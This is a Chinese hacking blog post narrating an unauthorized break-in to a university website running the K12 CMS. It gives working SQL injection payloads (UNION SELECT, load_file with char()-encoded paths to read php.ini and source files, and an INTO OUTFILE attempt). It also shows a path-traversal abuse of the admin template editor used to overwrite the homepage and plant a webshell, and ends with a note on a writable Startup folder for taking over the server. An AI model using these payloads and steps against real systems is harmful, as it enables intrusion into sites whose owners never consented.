转自：零客网安
作者：小蟑螂

06年时刚入大学，激情澎湃，当时把我们学校当地的所有高校主站都检测了一遍。
两年后再来，发现当时留的shell已经不在了。而且服务器有所变动。
以前杂7杂8的程序不见了，只剩主站这一个光杆php。服务器也不支持asp了。估计这中间没少有人蹂躏它。。
一时勃起想再进去玩玩。黑盒下这个主程序吧。。

看首页的几个连接
http://www.xxx.com/cms/app/info/doc/index.php/27506
去掉后面的参数
http://www.xxx.com/cms/app/info/doc/index.php
Fatal error: CMS 错误：参数 $pCatBodyId 不能为空。 in D:\K12Product\php\includes\cms\cms.class.php on line 0

参数名跟着绝对路径就出来了。。。

加上参数跟单引号
http://www.xxx.com/cms/app/info/doc/index.php?pCatBodyId=27506'
接着报错
Fatal error: Call to a member function on a non-object in d:\k12product\htdocs\cms\app\info\doc\index.php on line 0
1=1正常返回生成的html文件,1=2则又返回错误


order by 14 正常.15错误.

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
看看他给了我什么...

您没有权限访问本内容，因为本内容所属的栏目可访问的用户类型为：
无
请使用相应的用户类型帐号登录。

fuck...不过没关系.好在接下来goole给了我另外一个射点.
http://www.xxx.com/cms/app/info/doc/note.php?pCatBodyId=2
7个字段.
猜表就郁闷了...没头苍蝇是的撞了一番无所收获.
试图看下mysql版本是不是5以上给我爆表段. 结果失望了.

没关系.准备outfile.
先来看下php.ini
c:\winnt\php.ini转下asc码99,58,92,119,105,110,110,116,92,112,104,112,46,105,110,105
union select 1,2,3,4,5,6,load_file(char(99,58,92,119,105,110,110,116,92,112,104,112,46,105,110,105))/*

运气不错,magic_quotes_gpc＝Off

union select 1,2,3,4,5,6,7 into outfile'd:/k12product/htdocs/cms/0kee.txt'
www.xxx.com/0kee.txt 不存在.
看来outfile没权限.

还是没关系,至少还有loadfile.看源文件找找表字段吧...

union%20select%201,2,3,4,5,6,load_file('d:/k12product/htdocs/cms/app/info/doc/note.php')/*

得到以下代码

Copy code

<?php if (!is_callable("mmcache_load") && !@dl((PHP_OS=="WINNT"||PHP_OS=="WIN32")?"TurckLoader.dll":"TurckLoader.so")) { die("This PHP script has been encoded with Turck MMcache, to run it you must install <a href=\"http://turck-mmcache.sourceforge.net/\">Turck MMCache or Turck Loader</a>");} return mmcache_load('eJzFWEuP40QQ7u54ZgIL7CwsnFccFikwsxLHJUHKJN7dkcjGk4RFSJEsJ+5MjBzbsh3Y+RFI3LjtnQMSJ86IAwf+An+Gqn74lcQzCQcizcRd1fXVo6urKh4Met3eC5MwQggl+HVE8DOk4otcEkobH8HDfJU8gT87uUlSvjr3gvl5tIxOxyDWaEg+/YIasHobVglP7VXorn3e7Uh+f9hDyA7+o7S5Re49WF2DnOOG7syeh0HQIcIqudnAzUCknzBK6Bb5d5Q8WukFi7Ak3ZRbBWMnwj1Y8fkytJfccXk8B9cxGs+6X43NbodRtB39QVP++uPPfzBoHSYdshDuBJ7tsTl6ZY7IFcZTejUyr742xxN7YE5eDPsPlDPWcDwx6KeMDIkF9ghVNhJBFCFFIKOek16E7s2le9FGQNIWAYTtp/C9TFd+EvG55/jzpRMnwif0Yu6k9gzEbM+lj8Fbgwr7iiqoJkSWc82zEEew0CJbrRIiL50Vv7NBCBuAQC3sMcKaK8fz74yLGBwlaoGbIophkPIgvTP0iUw2lFHg3baM7LdnqzP30fKp9zQpQaGTrpPyLNtwkXq51zvy457Ij8FwYtrdfn8kxDGlvEgJbqavTNb3cVOQ8BgyHk47CFNux8m0aI+4LhcdkbdTphjV9AA+sqaNgqA4LWAgbWooRh5u4CBxeqQ4JXeBifTpsWIqZ4CMlOmJIhcjDDxcdk7kVWp9QyydN/ZzM0vW8n24Lder0rWpvivI93VN0TpqImyxLQY1qSxMBVrHYFhMsuLBVInC5zihjwHLYKPsUiw87ruJdEIIjXVZyTBTL/VLt0uXNYnyLh5POAe/XP7aXsf6hlnbIgg8VNJmhXNKotgL0oVQXHIGsPYI4G0pekAAuzJHSUM9HwnIdZAidsfYM7pERxdh0jB1St5hJIL1Kg5/QBhwgD7UQdwr17IyJTUIr4vYR7DHYNAXfiQWqd8KG8EbSqA1Ces/RD9bP23I0aoc2KS8OlLGSZ9YwypZ/JlBfiYVJ4TrqK31Rh5Zxso8k4AfaEfekApnZ1gyGgMKzbOiaHwDmUxA4AmGiwVMGwKE0eeENuV5v4V5y31b+Sa4goGYXsELoVcSharcyofC/rPfIId+J69y2Y9BrvULsYxcMMcYsw3lE8hCw5Betn4l/+NVOVVcAe+5j/rmuFeq8cU4V6t8Idiqxnckq3zBhJv5OeAWVLfzDIg+AwUg7yZaZQ6fQf49oNVAlzbWX2KpeQIShoHHoNqRq1JuL2BWD6z75iHQjXrorPMegm3UYxd79yZ84WBHVN84DY/oIg9UP4ERSUSf6bK4j6TQeL7ZetI4jsKEZuWgC2wMV1vUfYWbrGewsUm15a3bEiCSybifq8e5wdnYJ3T4n8/iGo2FUUdGuFJLitdHlgI8lEH4PX/JX6fyZwxMRX+TrOYlKydOb9RmbO9OknjXgT2DAYUv8KaXKxApzH9ljpr+9K+YPTTk7aWInlMPR86aQBE4I/43i+XpVC2W1MORq5WY3D5vH6BlY/QiqhFk4x7m9LZxL290m+Me3TXufUcONXTLcFqMyBb2nYKCtrleEvnOTXnKZVj4kCtfOYjKx7LXDleE6Y7SvxxBkWCyET4RXXDlua7Pz9PI17/wa15RZC8IFiHIbn9BoMW/lPUKP/8C7QWWiw==');?>

代码先经过base64加密后又mmcache加密. base64可解,可mmcache目前不可逆..



看路径中的k12product,直觉告诉我这是个类似于phpcms发布的pc_webserver的东西...
百度一下 k12product 发现这套系统叫做 K12 网站信息发布系统标准版,叫卖两万6千大洋官方还没有样品下载.baidu google翻页翻的我手指都疼了也没能翻出一个提供下载的...

没头绪的时候想到了迅雷...
没想到还真在这把它找着了... 十分之兴奋的下载回来装上看网站结构...
sql帐号密码配置文件不在WEB目录..而在K12Product\php\includes\cms\cms_config2.inc.php
得到sql,连接,但不允许远程连接.

那就找后台吧...后台地址是cms/app/admin 帐号在ftp_users表内.

进到后台在综合设置里看到有个模板管理.里面列出了一些模板.鼠标指上去看到状态栏的地址为
http://www.xxx.com/cms/app/admin/complex/tpl_edit.php?pCurDir=/index_footer.tpl
直觉告诉我pCurDir=/index_footer.tpl又有的玩了...
把index_footer.tpl换为../../../index.php,访问..
呵呵,可以直接改首页了...

至此,我可爱的shell顺利到手...
登上shell瞧瞧
c:/Documents and Settings/Administrator/「开始」菜单/程序/启动 目录可写
这台机已经没悬念了

注：为了避免不必要的麻烦，文中此站url全部XXX掉。